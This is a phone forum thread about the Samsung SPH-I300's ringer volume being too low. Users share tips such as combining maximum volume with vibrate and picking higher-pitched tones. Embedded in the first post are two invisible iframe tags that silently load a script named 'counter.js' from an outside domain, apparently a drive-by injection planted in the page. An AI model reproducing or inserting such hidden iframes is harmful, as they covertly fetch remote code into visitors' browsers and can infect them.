+ Reply to Thread
    fbg

Ringer Volume too Low

Even when adjusted to its highest volume (, my Ringer Volume seems too low. Anyone Else? <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I agree, but I don't think there is much you can do about it. I'd like the ringer to be louder, especially in the case I have, where the speaker is covered up. When I am in high noise areas I use ringer level 8 AND vibrate.
    Carl

Angry Too Low Also

I'd have to agree that the ringer volume is too low. When I am in my car and have any other noise at all, I can't hear the phone ring.

Laurie

Same. I keep the volume at max plus vibrate.

ringer too low

I agree. The ringer on the SPH-I300 is too low, even at the loudest setting.

I had a Samsung SCH-6100 phone on Sprint who's ringer blew this one away.

Unhappy Agree on the Ringer Level

Hello All,

Yes I agree the ringer sound level is not loud enough...I did not know that you could do ringer plus vibrate, thanks for the info!! I wonder if anyone from Samsung is reading all these complaints and will do something about them??
    EMR

Administrator

Arrow

i posted a thread asking what tones you guys use, but yall never posted! shame on you!!

i have only used 2 ringers since i have had the phone and they were both loud enuff for me to hear them... all the way up on the highest setting+vib...

so YMMV. :p

Ringer 1 seems a little louder than the rest, but still too quiet.

-Seth

After I noticed the ringer volume was too low after missing a few calls, I played around with the different ringers. I noticed that the higher pitched ones were alot more audible, especially through clothing, than lower pitched ones. I guess we just need to work with what we got!